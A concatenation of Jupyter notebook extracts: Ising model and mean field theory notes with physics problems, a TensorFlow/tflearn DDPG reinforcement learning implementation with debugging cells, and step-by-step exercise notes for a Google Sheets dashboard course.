$$f(r=|j-k|) = \langle s_j s_k \rangle \sim r^{-d+2+\eta}e^{-r/\xi}$$
$$\xi \sim |T-T_c|^{-\nu}$$
### Mean field exponents
We can derive the value of critical exponent $\beta$ within mean field approximation by Taylor expanding the hyperbolic tangent
$$tanh(x) \approx x-\frac{1}{3}x^3+...$$
$$m = tanh(\beta J z m) \approx \beta J z m - \frac{1}{3} (\beta Jzm)^3$$
- One solution is obviously m = 0 which is the only solution above $T_c$
- Below $T_c$ the non-zero solution is found $m=\sqrt{3}\frac{T}{T_c} \Big(1-\frac{T}{T_c} \Big)^{1/2}+...$
- $\beta_{MFA}=1/2$
### Helmholtz Free energy
$$dF_{T, M} = -SdT + BdM $$
$$F = \int dF = F_0 + \int^{M}_0 B(M) dM$$
We will now make use of Mean field theory to approximate dependence of field on magnetization: $h(m) \approx m(1-T_c/T)+ 1/3 m^3$ which enables us to evaluate the integral above.
$$B(M) = aM +bM^3$$
$$F = F_0 + \frac{1}{2}aM^2 + \frac{1}{4} bM^4$$
Equilibirum is found by minimizing the free energy: $aM +bM^3 = 0$ with solutions M = 0 and $M=\pm (-a/b)^{1/2}$
- $T < T_c$ case we get $a<0$ and $M=\pm (-|a|/b)^{1/2} = \pm M_S$
- $T > T_c$ case we get $a>0$ and $M=0$
```
@widgets.interact(T=(400,800))
def HelmF(T=400):
Tc=631 # constnt for Ni
a = 882*(T/Tc-1)
b = 0.4734*T
M = np.linspace(-2,2,1000)
plt.plot(M, 0.5*a*M**2 + 0.25*b*M**4, lw=4, color='brown', label=f"T/Tc = {(T/Tc)}")
plt.grid(True)
plt.xlim([-2,2])
plt.ylim([-140,200])
plt.ylabel('$F(M)$')
plt.xlabel('$M$')
plt.legend()
```
### Problems
1. Use Transfer matrix method to solve general 1D Ising model with $h = 0$ (Do not simply copy the solution by setting h=0 but repeat the derivation :)
<br>
2. Find the free energy per particle $F/N$ in the limit $n\rightarrow \infty $ for both periodic bounary codnition conditions and free boundary cases.
3. Plot temperature dependence of heat capacity and free energy as a function for $(h=\neq, J\neq 0)$ $(h=0, J\neq 0)$ and $(h=\neq, J\neq \neq)$ cases of 1D Ising model. Coment on the observed behaviours.
4. Explain why heat capacity and magnetic susceptibility diverge at critical temperatures.
5. Explain why correlation functions diverge at a critical temperature
6. Explain why are there universal critical exponents.
7. Explain why the dimensionality and range of intereactions matters for existance and nature of phase transitions.
8. Using mean field approximation show that near critical temperature magnetization per spin goes as $m\sim (T_c-T)^{\beta}$ (critical exponent not to nbe confused with inverse $k_B T$) and find the value of \beta. Do the same for magnetic susceptibility $\chi \sim (T-T_c)^{-\gamma}$ and find the value of $\gamma$
9. Explain what is the nature of mean field theory approximation and why is predictions fail for low dimensionsal systems but consistently get better with higher dimensions?
10. Consider a 1D model given by the Hamiltonian:
$$H = -J\sum^{N}_{i=1} s_i s_{i+1} + D\sum^{N}_{i=1} s^2_i $$
where $J>1$, $D>1$ and $s_i =-1,0,+1$
- Assuming periodic boundary codnitions calcualte eigenvalues of the transfer matrix
- Obtain expresions for internal energy, entropy and free energy
- What is the ground state of this model (T=0) as a function of $d=D/J$ Obtain asymptotic form of the eigenvalues of the transfer matrix in the limit $T\rightarrow 0$ in the characteristic regimes of d (e.g consider differnet extereme cases)
| github_jupyter |
```
"""
Implementation of DDPG - Deep Deterministic Policy Gradient
Algorithm and hyperparameter details can be found here:
http://arxiv.org/pdf/1509.02971v2.pdf
The algorithm is tested on the Pendulum-v0 OpenAI gym task
and developed with tflearn + Tensorflow
Author: Patrick Emami
"""
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is
# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab
class OrnsteinUhlenbeckActionNoise:
def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):
self.theta = theta
self.mu = mu
self.sigma = sigma
self.dt = dt
self.x0 = x0
self.reset()
def __call__(self):
x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \
self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)
self.x_prev = x
return x
def reset(self):
self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)
def __repr__(self):
return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)
# ===========================
# Tensorflow Summary Ops
# ===========================
def build_summaries():
episode_reward = tf.Variable(0.)
tf.summary.scalar("Reward", episode_reward)
episode_ave_max_q = tf.Variable(0.)
tf.summary.scalar("Qmax Value", episode_ave_max_q)
summary_vars = [episode_reward, episode_ave_max_q]
summary_ops = tf.summary.merge_all()
return summary_ops, summary_vars
# ===========================
# Agent Training
# ===========================
def train(sess, env, args, actor, critic, actor_noise):
# Set up summary Ops
summary_ops, summary_vars = build_summaries()
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(args['summary_dir'], sess.graph)
# Initialize target network weights
actor.update_target_network()
critic.update_target_network()
# Initialize replay memory
replay_buffer = ReplayBuffer(int(args['buffer_size']), int(args['random_seed']))
# Needed to enable BatchNorm.
# This hurts the performance on Pendulum but could be useful
# in other environments.
# tflearn.is_training(True)
for i in range(int(args['max_episodes'])):
s = env.reset()
ep_reward = 0
ep_ave_max_q = 0
for j in range(int(args['max_episode_len'])):
if args['render_env']:
env.render()
# Added exploration noise
#a = actor.predict(np.reshape(s, (1, 3))) + (1. / (1. + i))
a = actor.predict(np.reshape(s, (1, actor.s_dim))) + actor_noise()
s2, r, terminal, info = env.step(a[0])
replay_buffer.add(np.reshape(s, (actor.s_dim,)), np.reshape(a, (actor.a_dim,)), r,
terminal, np.reshape(s2, (actor.s_dim,)))
# Keep adding experience to the memory until
# there are at least minibatch size samples
if replay_buffer.size() > int(args['minibatch_size']):
s_batch, a_batch, r_batch, t_batch, s2_batch = \
replay_buffer.sample_batch(int(args['minibatch_size']))
# Calculate targets
target_q = critic.predict_target(
s2_batch, actor.predict_target(s2_batch))
y_i = []
for k in range(int(args['minibatch_size'])):
if t_batch[k]:
y_i.append(r_batch[k])
else:
y_i.append(r_batch[k] + critic.gamma * target_q[k])
# Update the critic given the targets
predicted_q_value, _ = critic.train(
s_batch, a_batch, np.reshape(y_i, (int(args['minibatch_size']), 1)))
ep_ave_max_q += np.amax(predicted_q_value)
# Update the actor policy using the sampled gradient
a_outs = actor.predict(s_batch)
grads = critic.action_gradients(s_batch, a_outs)
actor.train(s_batch, grads[0])
# Update target networks
actor.update_target_network()
critic.update_target_network()
s = s2
ep_reward += r
if terminal:
summary_str = sess.run(summary_ops, feed_dict={
summary_vars[0]: ep_reward,
summary_vars[1]: ep_ave_max_q / float(j)
})
writer.add_summary(summary_str, i)
writer.flush()
print('| Reward: {:d} | Episode: {:d} | Qmax: {:.4f}'.format(int(ep_reward), \
i, (ep_ave_max_q / float(j))))
break
def main(args):
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
critic = CriticNetwork(sess, state_dim, action_dim,
float(args['critic_lr']), float(args['tau']),
float(args['gamma']),
actor.get_num_trainable_vars())
actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
if args['use_gym_monitor']:
if not args['render_env']:
env = wrappers.Monitor(
env, args['monitor_dir'], video_callable=False, force=True)
else:
env = wrappers.Monitor(env, args['monitor_dir'], force=True)
train(sess, env, args, actor, critic, actor_noise)
if args['use_gym_monitor']:
env.monitor.close()
def start():
# if __name__ == '__main__':
parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# agent parameters
parser.add_argument('--actor-lr', help='actor network learning rate', default=0.0001)
parser.add_argument('--critic-lr', help='critic network learning rate', default=0.001)
parser.add_argument('--gamma', help='discount factor for critic updates', default=0.99)
parser.add_argument('--tau', help='soft target update parameter', default=0.001)
parser.add_argument('--buffer-size', help='max size of the replay buffer', default=1000000)
parser.add_argument('--minibatch-size', help='size of minibatch for minibatch-SGD', default=64)
# run parameters
parser.add_argument('--env', help='choose the gym env- tested on {Pendulum-v0}', default='Pendulum-v0')
parser.add_argument('--random-seed', help='random seed for repeatability', default=1234)
parser.add_argument('--max-episodes', help='max num of episodes to do while training', default=50000)
parser.add_argument('--max-episode-len', help='max length of 1 episode', default=1000)
parser.add_argument('--render-env', help='render the gym env', action='store_true')
parser.add_argument('--use-gym-monitor', help='record gym results', action='store_true')
parser.add_argument('--monitor-dir', help='directory for storing gym results', default='./results/gym_ddpg')
parser.add_argument('--summary-dir', help='directory for storing tensorboard info', default='./results/tf_ddpg')
parser.set_defaults(render_env=True)
parser.set_defaults(use_gym_monitor=True)
args = vars(parser.parse_args())
pp.pprint(args)
main(args)
%run ddpg.py --max-episodes 1000
s_dim = 10
a_dim = 4
inputs = tflearn.input_data(shape=[None, s_dim])
action = tflearn.input_data(shape=[None, a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
reluout = net
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
actout = net
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
# print(inputs,action)
print("t1",t1)
print("t1.W",t1.W)
print("reluout",reluout)
print("actout",actout)
matout = tf.matmul(reluout, t1.W)
print("matout",matout)
print("w_init",w_init)
print("out",out)
a = tf.constant(0.)
b = 2 * a
g = tf.gradients(a + b, [a, b] )
g[0]
batch_size = 10
lx = lambda x: tf.div(x, batch_size)
lx(10)
import argparse
parser = argparse.ArgumentParser(description='provide arguments for DDPG agent')
# agent parameters
parser.add_argument('--actor-lr', help='actor network learning rate', default=0.0001)
parser.add_argument('--critic-lr', help='critic network learning rate', default=0.001)
parser.add_argument('--gamma', help='discount factor for critic updates', default=0.99)
parser.add_argument('--tau', help='soft target update parameter', default=0.001)
parser.add_argument('--buffer-size', help='max size of the replay buffer', default=1000000)
parser.add_argument('--minibatch-size', help='size of minibatch for minibatch-SGD', default=64)
# run parameters
parser.add_argument('--env', help='choose the gym env- tested on {Pendulum-v0}', default='Pendulum-v0')
parser.add_argument('--random-seed', help='random seed for repeatability', default=1234)
parser.add_argument('--max-episodes', help='max num of episodes to do while training', default=50000)
parser.add_argument('--max-episode-len', help='max length of 1 episode', default=1000)
parser.add_argument('--render-env', help='render the gym env', action='store_true')
parser.add_argument('--use-gym-monitor', help='record gym results', action='store_true')
parser.add_argument('--monitor-dir', help='directory for storing gym results', default='./results/gym_ddpg')
parser.add_argument('--summary-dir', help='directory for storing tensorboard info', default='./results/tf_ddpg')
parser.set_defaults(render_env=False)
parser.set_defaults(use_gym_monitor=True)
args = vars(parser.parse_args())
print (args.accumulate(args.integers))
# pp.pprint(args)
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args()
print (args.echo())
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
with tf.Session() as sess:
env = gym.make('Pendulum-v0')
np.random.seed(int('1234'))
tf.set_random_seed(int('1234'))
env.seed(int('1234'))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
print("state_dim {} action_dim {} action_bound {}".format(state_dim,action_dim,action_bound))
print("action_bound type {}".format(type(action_bound)))
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
# actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
# float(args['actor_lr']), float(args['tau']),
# int(args['minibatch_size']))
# critic = CriticNetwork(sess, state_dim, action_dim,
# float(args['critic_lr']), float(args['tau']),
# float(args['gamma']),
# actor.get_num_trainable_vars())
# actor_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(action_dim))
# if args['use_gym_monitor']:
# if not args['render_env']:
# env = wrappers.Monitor(
# env, args['monitor_dir'], video_callable=False, force=True)
# else:
# env = wrappers.Monitor(env, args['monitor_dir'], force=True)
# train(sess, env, args, actor, critic, actor_noise)
# if args['use_gym_monitor']:
# env.monitor.close()
import numpy as np
testaction=np.array([2.])
testaction
import tensorflow as tf
import numpy as np
import gym
from gym import wrappers
import tflearn
import argparse
import pprint as pp
from replay_buffer import ReplayBuffer
# ===========================
# Actor and Critic DNNs
# ===========================
class ActorNetwork(object):
"""
Input to the network is the state, output is the action
under a deterministic policy.
The output layer activation is a tanh to keep the action
between -action_bound and action_bound
"""
def __init__(self, sess, state_dim, action_dim, action_bound, learning_rate, tau, batch_size):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.action_bound = action_bound
self.learning_rate = learning_rate
self.tau = tau
self.batch_size = batch_size
# Actor Network
self.inputs, self.out, self.scaled_out = self.create_actor_network()
self.network_params = tf.trainable_variables()
# Target Network
self.target_inputs, self.target_out, self.target_scaled_out = self.create_actor_network()
self.target_network_params = tf.trainable_variables()[
len(self.network_params):]
# Op for periodically updating target network with online network
# weights
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) +
tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# This gradient will be provided by the critic network
self.action_gradient = tf.placeholder(tf.float32, [None, self.a_dim])
# Combine the gradients here
self.unnormalized_actor_gradients = tf.gradients(
self.scaled_out, self.network_params, -self.action_gradient)
self.actor_gradients = list(map(lambda x: tf.div(x, self.batch_size), self.unnormalized_actor_gradients))
# Optimization Op
self.optimize = tf.train.AdamOptimizer(self.learning_rate).\
apply_gradients(zip(self.actor_gradients, self.network_params))
self.num_trainable_vars = len(
self.network_params) + len(self.target_network_params)
def create_actor_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
net = tflearn.fully_connected(net, 300)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Final layer weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(
net, self.a_dim, activation='tanh', weights_init=w_init)
# Scale output to -action_bound to action_bound
scaled_out = tf.multiply(out, self.action_bound)
return inputs, out, scaled_out
def train(self, inputs, a_gradient):
self.sess.run(self.optimize, feed_dict={
self.inputs: inputs,
self.action_gradient: a_gradient
})
def predict(self, inputs):
return self.sess.run(self.scaled_out, feed_dict={
self.inputs: inputs
})
def predict_target(self, inputs):
return self.sess.run(self.target_scaled_out, feed_dict={
self.target_inputs: inputs
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
def get_num_trainable_vars(self):
return self.num_trainable_vars
class CriticNetwork(object):
"""
Input to the network is the state and action, output is Q(s,a).
The action must be obtained from the output of the Actor network.
"""
def __init__(self, sess, state_dim, action_dim, learning_rate, tau, gamma, num_actor_vars):
self.sess = sess
self.s_dim = state_dim
self.a_dim = action_dim
self.learning_rate = learning_rate
self.tau = tau
self.gamma = gamma
# Create the critic network
self.inputs, self.action, self.out = self.create_critic_network()
self.network_params = tf.trainable_variables()[num_actor_vars:]
# Target Network
self.target_inputs, self.target_action, self.target_out = self.create_critic_network()
self.target_network_params = tf.trainable_variables()[(len(self.network_params) + num_actor_vars):]
# Op for periodically updating target network with online network
# weights with regularization
self.update_target_network_params = \
[self.target_network_params[i].assign(tf.multiply(self.network_params[i], self.tau) \
+ tf.multiply(self.target_network_params[i], 1. - self.tau))
for i in range(len(self.target_network_params))]
# Network target (y_i)
self.predicted_q_value = tf.placeholder(tf.float32, [None, 1])
# Define loss and optimization Op
self.loss = tflearn.mean_square(self.predicted_q_value, self.out)
self.optimize = tf.train.AdamOptimizer(
self.learning_rate).minimize(self.loss)
# Get the gradient of the net w.r.t. the action.
# For each action in the minibatch (i.e., for each x in xs),
# this will sum up the gradients of each critic output in the minibatch
# w.r.t. that action. Each output is independent of all
# actions except for one.
self.action_grads = tf.gradients(self.out, self.action)
def create_critic_network(self):
inputs = tflearn.input_data(shape=[None, self.s_dim])
action = tflearn.input_data(shape=[None, self.a_dim])
net = tflearn.fully_connected(inputs, 400)
net = tflearn.layers.normalization.batch_normalization(net)
net = tflearn.activations.relu(net)
# Add the action tensor in the 2nd hidden layer
# Use two temp layers to get the corresponding weights and biases
t1 = tflearn.fully_connected(net, 300)
t2 = tflearn.fully_connected(action, 300)
net = tflearn.activation(
tf.matmul(net, t1.W) + tf.matmul(action, t2.W) + t2.b, activation='relu')
# linear layer connected to 1 output representing Q(s,a)
# Weights are init to Uniform[-3e-3, 3e-3]
w_init = tflearn.initializations.uniform(minval=-0.003, maxval=0.003)
out = tflearn.fully_connected(net, 1, weights_init=w_init)
return inputs, action, out
def train(self, inputs, action, predicted_q_value):
return self.sess.run([self.out, self.optimize], feed_dict={
self.inputs: inputs,
self.action: action,
self.predicted_q_value: predicted_q_value
})
def predict(self, inputs, action):
return self.sess.run(self.out, feed_dict={
self.inputs: inputs,
self.action: action
})
def predict_target(self, inputs, action):
return self.sess.run(self.target_out, feed_dict={
self.target_inputs: inputs,
self.target_action: action
})
def action_gradients(self, inputs, actions):
return self.sess.run(self.action_grads, feed_dict={
self.inputs: inputs,
self.action: actions
})
def update_target_network(self):
self.sess.run(self.update_target_network_params)
args = {}
args['env'] = "Pendulum-v0"
args['random_seed'] = 1234
args['actor_lr'] = 0.0001
args['critic-lr'] = 0.001
args['tau'] = 0.001
args['minibatch_size'] = 64
args
tf.reset_default_graph()
with tf.Session() as sess:
env = gym.make(args['env'])
np.random.seed(int(args['random_seed']))
tf.set_random_seed(int(args['random_seed']))
env.seed(int(args['random_seed']))
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
action_bound = env.action_space.high
# Ensure action bound is symmetric
assert (env.action_space.high == -env.action_space.low)
print("state_dim {} action_dim {} action_bound {}".format(state_dim,action_dim,action_bound))
actor = ActorNetwork(sess, state_dim, action_dim, action_bound,
float(args['actor_lr']), float(args['tau']),
int(args['minibatch_size']))
print("actor.network_params length {}".format(len(actor.network_params)))
# print("actor.network_params {}".format(actor.network_params))
print("actor.target_network_params length {}".format(len(actor.target_network_params)))
print("actor.update_target_network_params length {}".format(len(actor.update_target_network_params)))
print("actor action_gradient {}".format(actor.action_gradient))
print("actor unnormalized_actor_gradients {}".format(actor.unnormalized_actor_gradients))
print("actor.scaled_out {}".format(actor.scaled_out))
print("actor.action_gradient {}".format(actor.action_gradient))
print("actor.network_params length {}".format(len(actor.network_params)))
print("actor.network_params {}".format(actor.network_params))
print("actor.actor_gradients {}".format(actor.actor_gradients))
```
| github_jupyter |
## Course Description
A picture can tell a thousand words - but only if you use the right picture! This course teaches you the fundamentals of data visualization with Google Sheets. You'll learn how to create common chart types like bar charts, histograms, and scatter charts, as well as more advanced types, such as sparkline and candlestick charts. You will look at how to prepare your data and use Data Validation and VLookup formulas to target specific data to chart. You'll learn how to use Conditional Formatting to apply a format to a cell or a range of cells based on certain criteria, and finally, how to create a dashboard showing plots and data together. Along the way, you'll use data from the Olympics, sharks attacks, and Marine Technology from the ASX.
### Business Intelligence and Using Dashboards
Learn about business intelligence and dashboards for analyzing information in todays data-driven world. Create a basic dashboard and master setting up your data to get the most out of it.
### Using data validation controls to pick from a list
In the dashboard example, you are going to pick sequential numbers from a list to show countries meal rankings.
INSTRUCTIONS
Change the rank using the drop-down menu, so that the ranks are displayed in order for countries 1 through 5.
See chapter1_1
### Using conditional formatting on a dashboard
Conditional formatting is another functionality that completed dashboards can contain that allows users to modify the visual display on the dashboard. Here, you will explore the conditional formatting on the same dashboard for the 2016 Olympic Games in Brazil.
INSTRUCTIONS
Highlight Gold, Silver, and Bronze figures and change the Conditional Formatting rule to Greater than or equal to number to 25.
HINT
The Gold, Silver, and Bronze figures are in F3:H12.
Conditional formatting is found by selecting Format then Conditional formatting.
### Creating a column chart from your data
In the dataset you'll find the medal statistics by country from the 2016 Olympic Games held in Brazil in order of ranking. Let's use the data to create a column chart to show the medal tallies of the first 3 ranked countries.
INSTRUCTIONS
Highlight Gold, Silver, and Bronze medal stats for the first three ranked countries, create a column chart and move it to the right of the data.
See chapter1_2
Need select both data and the country names to the left. May edit the type of chart as the default type might not be the column chart.
### Setting up your worksheet with formulas of reference
In this next task, you will showcase only the data you want to chart using formulas of reference to extract the top 3 countries medal tallies from the dataset and show them in the Dashboard.
INSTRUCTIONS
Create a formula of reference in cell A1 that shows the contents of A1 in the dataset.
Copy the calculation down and across the sheet to show all data for the first 3 ranked countries.
Make sure column B is wide enough to see the entire country name.
See chapter1_3
=Olympics!A1 Write this in sheet 1 and they drag both vertically and horizontally. Note Olympics is the name of another sheet.
### Charting the medal statistics
Now that you have only the data you want to chart in this task you will create a column chart and display it underneath your extracted data.
INSTRUCTIONS
Create a column chart showing the country, Gold, Silver, and Bronze stats.
Position the chart underneath the data.
Just plot the data in the selected data in previous cell.
### Getting started
Setting up your data in the correct way in the beginning will save you lots of time and effort later on. Here, you will set up your data so you have an efficient spreadsheet to work with as you create your dashboard.
INSTRUCTIONS
Remove all rows from the dataset that are empty.
You can select multiple rows at once by holding down the Ctrl or command key.
### Format dates and numbers
To make your data clear at a glance, in this task you will apply a little bit of formatting to your data.
INSTRUCTIONS
Format the date so that it shows the day, month in full and year and widen the column so you can see it all.
Ensure all numbers have 2 decimal places.
HINT
To format the date go to Format then Number. Then choose ....
To increase decimals, use the toolbar icon. Select all the data values, and then click the relevant icon in toolbar.
## Efficient Column Charts
Create and format a column chart to showcase data and learn a few smart tricks along the way. Look at using named ranges to refer to cells in your worksheet, making them user-friendly and easy to work with.
### Creating a column chart for your dashboard
In this chapter, you will start to put together your own dashboard.
Your first step is to create a basic column chart showing fatalities, injured, and uninjured statistics for the states of Australia over the last 100 years.
INSTRUCTIONS
In A1 use a formula that refers to the heading on your dataset.
Select the State column and the Fatal, Injured, and Uninjured statistics, and create a chart.
Change the chart to a column chart.
See chapter1_4
Use the following to refer to the 'Shark Attacks' sheet and the range A1:E1. Note the ! sign.
='Shark Attacks'!A1:E1
### Format chart, axis titles and series
Your next task is to apply some basic formatting to the same chart to jazz it up a bit and make it a bit more pleasing to the readers eye.
INSTRUCTIONS
Alter the Title of your chart to Fatal, Injured and Uninjured Statistics make the color black and bold it.
Change the series colors to Fatal - red, Injured - blue, Uninjured - green.
In chart editor -> customize -> Select the drop down arrow next to All series and select each series in turn to change the color.
### Removing a series
Taking things a little further, in the next task you will manipulate the look of your chart a bit more and remove the Uninjured statistical data.
INSTRUCTIONS
Remove the Uninjured series from your chart.
HINT
On the setup tab, click the 3 dots to the right of the series you wish to remove to see this option.
See chapter1_5
### Changing the plotted range
Its just as easy to change a range as it is to delete it. For this task, have a go at changing the range of your chart so it now only showcases the top 3 States Fatal satistics.
INSTRUCTIONS
Change the range of your chart so you are plotting only the fatalites from the 3 states with the highest numbers and change the chart title to Top 3 States Number of Fatalities.
Don't forget you can select the range to be charted, or you can type it out.
### Using named ranges
In this task you are going find an existing range and insert a blank row within the range.
INSTRUCTIONS
'- Select Data in the menu then Named ranges and click on the SharkStats Named range to see the highlighted range.
Insert a blank row after row 1.
Did you notice that even though you inserted the blank row, your Named range didn't change? We have just looked at the basic named range in this course, but there are many other types you can use with your data, Remember that named ranges cannot contain spaces, however you can use an underscore to separate words.
### Summing using a Named range
In this task you will remove a blank row and use a Named range in a formula.
INSTRUCTIONS
Remove the blank row you inserted in the last exercise.
In B10 use the named range Total in-lieu of cell references to sum the totals in C10 :E10.
Remember that if you create a named range in a sheet, it will still be be viewable and usable in the Named range menu on any sheet within your workbook.
=sum(Total) Total is just the equivalent of range c10:E10
### Averaging using a Named range
In this task you will use a named range within a formula to find an average.
INSTRUCTIONS
In C11 use the named range Fatalities in-lieu of cell references to average the number of Fatalities.
